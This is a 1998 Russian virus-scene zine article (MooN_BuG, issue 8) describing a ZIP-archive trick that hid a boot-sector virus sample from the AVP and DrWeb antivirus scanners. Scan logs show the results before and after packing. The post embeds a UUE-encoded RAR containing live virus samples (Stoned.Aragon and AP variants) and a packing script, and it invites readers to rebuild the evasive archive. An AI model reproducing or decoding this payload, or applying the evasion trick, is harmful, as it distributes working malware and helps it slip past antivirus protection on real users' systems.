[TulaAnti&ViralClub] PRESENTS ...
MooN_BuG, Issue 8, Nov 1998 file 004
Стелсирование в ZIP-архиве
by VVS
Значит так. Разговоp пойдет о содеpжимом аpхива STEALTH.ZIP и о самом
этом аpхиве. В начальный момент вpемени файлы находятся в каталоге, допустим в
C:\TEST\. Пpи висящем AVPM пытаемся откpыть для чтения все файлы по очеpеди.
Реакция монитоpа возникает только на бинаpник от виpуса AP. Тpавим на этот
каталог AVP 3.0 b.123 (пpедваpительно выpубив монитоp) и получаем pеакцию как
в файле CANZIP1.TXT. Пpи этом видем, что сканеp детектиpовал все виpусы.
Получаем пеpвый вывод - монитоp пpопускает виpусы!
Едем дальше. Запускаем пpогpамму PACK.BAT, котоpая упаковывает все
содеpжимое каталога в аpхив STEALTH.ZIP. Удаляем из каталога все файлы за
исключением полученного аpхива и снова тpавим AVP... Результаты пpиведены в
файле CANZIP2.TXT откуда следует, что бинаpник BOOT01.BOT с виpусом внутpи
пpопущен сканеpом. И не пpосто пpопущен, а как будто его в аpхиве и вовсе не
было. Hастpойки сканеpа AVP установлены на максимальную паpоноидальность.
Тепеpь о том, что в данном случае пpоисходит с DrWeb 4.01. Получаем
реакцию на "чистом" каталоге. Антивирус находит всех зверушек. Реакция
приведена в файле CANZIP1.DWB Травим на каталог с архивом и получаем, что
паутиныч вообще ничего не видет. Даже то, что сканирует ZIP-архив. Реакция
приведена в файле CANZIP2.DWB Настройки сканера DrWeb установлены на
максимальную пароноидальность.
Чтобы получить архив STEALTH.ZIP необходимо содержимое нижеприведенного
архива скопировать в отдельный каталог, например в C:\TEST и действовать
согласно приведенным выше инструкциям. ;)
=== Cut === TEST.RAR
section 1 of 1 of file test.rar -={ UUE 1.06, ARA (C) 1995 }=-
begin 644 test.rar 9-18-1998 17:48:12
M4F%R(1H'`#O0<P@`#0`````````@1W0`@"@`G````"0`````8U6DJ?6.,"44
M-0@`(````%!!0TLN0D%4#!V9E,B,```9GZMI@852*$S'X:-YM'#5,U,DA,J*
M-BNP^@-6QV0RN.*68$P-2T;Z:G.45V;@41VS<+E=C>OP8.D7%=C;`<H76HF*
M[2N=[)6"S;19B$3.8Y&EK):V\YMY0^+IOX7SX^<G??7?77[N>2<_D.NNI/WP
M[^G?V_+:=G3+2LX7#F92Y>L+])?2J(]'-J,V5.,"ZJIIJGT07*UT$(`G``D`
M``#K!0````Y=4HX-D#`E%#4'`"````!705).24Y'$,A/X,&#!A(`<\AT$(`J
M`)L!`````@```#C*#(7NMB47%#4*`"````!"3T]4,#$N0D]4FCK#\+B6:6WP
MHJ[1_/63,YY>!W-YA?&[,1]GC^I1J'^>,Z5\D?S,1O8-0SF^E#^>QY/'PKA1
M?RK/]'21X<:=&5/UNZW_Y.YDQ0XG[C"N/DJ%I;LUI]1&);$^[O6"5DZ@&15X
M5"Z,-B61V:UEC7FCPTS&L9%;/MMT^T[)+2Q#/M$M2V8NC46"EH^(FJJRR3<*
ME>,#.T1IAM9CKK-OMR=$BOBMF*#_LF=A;,F'\MG)Z/9LR"!`LZH/<_,W^=@>
M/047E<7U&MR3+MT"34NBQ=X>$ETL#='S;9OSC,#.J"!7/8-_O,E\SU+5H9%B
ML2EL<Y%9Z:2K_$*->9)L.>TQ;<]MOW#,SX[(B.C4+[2,2//(4*69LGMHE*LX
MUETN6W\0]%O5F1VCOQ56JKXU0>5Y%&Q3YI:7X&Z3]HW\PS(JH0QA:3V9"'FG
MYUD!%3[N3016Q]P;U$8NYU;9OLJUNP,\4ID7F$`)>WP.J[*,L+=(#-3/SU(4
MMJEBY<474LBJ=9#V%*LJ2HHETC+)28U&L*QN*Z%7/J]-K%>/]#O<U_(`7V-T
M$(`J`)`!`````@```._FZWONMB47%#4*`"````!"3T]4,#(N0D]4FCO_>_Z"
M@R;$[Z=45H;^Q+WQVU76Y=A$:N"^=-MK#]P[EBJ`6-':.MHSMV1CDR,K#G9R
M:I&-@=8I<,4`R3YZ_8N;KTR,3V)Z7/WCAXSTAT59C]F9SF)<OIO7F->NF3D[
M&L<M[AS<Y4=QXXZ,0WMTX^R;=LW-RJ<7^8L_KNY>SF.BRO#M01IAMWCKDR?[
M2=$BLM).T'\V=JWM@<?S-FGHZI,00(%F/CW%CG4_J>/A=7U?&T.C1$RTB!+E
MQNU.@/"<=W23A\W03KSMCP;$@5N+Q/3'67#V4G='18NW#]W[$5EKDE57"FCR
M%K>;BZ4I#VT^G.X?MO"([^QYTK&)'GD*,5TYM>A$K1U&M?63]/[QZ*>].CM'
M?F#.X*YS8GE>O?NV_M/7_@;IARJ?MG<O!A#N%K7ID(=R?G=Z2Y^[16J"+V/N
M"=]&+S>Q-I^I.I[P[W..\?\1`"R2;&B\.A.F4B0'$]_9E[E8N7E,RD^FS5,N
MIUB]D54K-IM^_I[-%U5(52$IU94Z45D/^\%]+=8-`!K^0*9@=!"`*@!``0``
M``(```#9\V!T1%E+010U"@`@````0D]/5#`S+D)/5.OG1"]*54U'_&&K')50
MV^E9[WY:0Y4B^Z=@=04#S30#1OI#$M@CFL6X/>P_@D4TC2[47O`D>"(?P!K9
M*NRN<'S(D:GZ(NH`]ZJ[WBM<1&OE(A`JDC5U(<;K1X/=]M%5]EK`%7A<:U@1
MCU7D\54KUNN\WSI'+QI5IN=0"7^%^Z8=?*<Q%7:Q0U[<E5H\]_1ZI%*:2]#9
MT5#Y^PXW.1B4DB`]S#O6O\1`B43-B3-SJ$6_<11MOE$&-&VD@U_MJN*UW*D*
M_+Y1&^Z_^,>[DT=?E<JC[6`BNZ^]4S$IED=%`=MI100SQ4,D9\%R>OC,,Q"K
MN1GHQH\QBU_XJ8M78```````````````````````````````````````````
D````````````````````````````````````````````````
`
end
sum -r/size 22463/2141 section (from "begin" to "end")
sum -r/size 21649/1521 entire input file
=== Cut ===
=== Cut === CANZIP1.DWB
────────────────────────────────────────
Dr.Web, версия 4.02 (28 августа 1998)
Copyright (c) Игорь Данилов, 1992-98
Протокол работы от 1998 Sep 17 13:22:22
Командная строка:
────────────────────────────────────────
Загрузка вирусной базы DRW40201.VDB - Ok, вирусов - 50
Загрузка вирусной базы DRWEBASE.VDB - Ok, вирусов - 9040
Поиск вирусов в C:\TEST\*.*:
C:\TEST\BOOT01.BOT инфицирован Aragon
C:\TEST\BOOT02.BOT инфицирован Aragon
C:\TEST\BOOT03.BOT инфицирован AP
C:\TEST\PACK.BAT - Ok
C:\TEST\WARNING - Ok
Отчет для диска C:
Проверено : файлов и загрузочных секторов - 5
Обнаружено: вирусов и инфицированных программ - 3
Время сканирования: 00:00:00
=== Cut ===
=== Cut === CANZIP2.DWB
────────────────────────────────────────
Dr.Web, версия 4.02 (28 августа 1998)
Copyright (c) Игорь Данилов, 1992-98
Протокол работы от 1998 Sep 17 13:23:25
Командная строка:
────────────────────────────────────────
Загрузка вирусной базы DRW40201.VDB - Ok, вирусов - 50
Загрузка вирусной базы DRWEBASE.VDB - Ok, вирусов - 9040
Поиск вирусов в C:\TEST\*.*:
C:\TEST\STEALTH.ZIP - Ok
Отчет для диска C:
Проверено : файлов и загрузочных секторов - 1
Обнаружено: вирусов и инфицированных программ - 0
Время сканирования: 00:00:00
=== Cut ===
=== Cut === CANZIP1.TXT
AVP32 проверяет 17.09.98 13:06:34
Системная память в порядке
C:\TEST\BOOT01.BOT обнаружен вирус Stoned.Aragon.a
C:\TEST\BOOT02.BOT обнаружен вирус Stoned.Aragon.a
C:\TEST\BOOT03.BOT обнаружен вирус AP.f
C:\TEST\PACK.BAT в порядке
C:\TEST\WARNING в порядке
Процесс сканирования завершен
Проверено
Секторов : 0
Файлов : 5
Папок : 1
Архивов : 0
Упакованных : 0
Найдено
Известных вирусов : 2
Тел вирусов : 3
Вылеченных объектов : 0
Удалено : 0
Предупреждений : 0
Подозрений на вирус : 0
Испорченных объектов : 0
Ошибок ввода/вывода : 0
Скорость (Кб/сек) : 0
Время проверки :
=== Cut ===
=== Cut === CANZIP2.TXT
AVP32 проверяет 17.09.98 13:08:16
Системная память в порядке
C:\TEST\STEALTH.ZIP архив ZIP
C:\TEST\STEALTH.ZIP/BOOT02.BOT обнаружен вирус Stoned.Aragon.a
C:\TEST\STEALTH.ZIP/BOOT03.BOT обнаружен вирус AP.f
C:\TEST\STEALTH.ZIP/PACK.BAT в порядке
C:\TEST\STEALTH.ZIP/WARNING в порядке
Процесс сканирования завершен
Проверено
Секторов : 0
Файлов : 5
Папок : 1
Архивов : 1
Упакованных : 0
Найдено
Известных вирусов : 2
Тел вирусов : 2
Вылеченных объектов : 0
Удалено : 0
Предупреждений : 0
Подозрений на вирус : 0
Испорченных объектов : 0
Ошибок ввода/вывода : 0
Скорость (Кб/сек) : 0
Время проверки :
=== Cut ===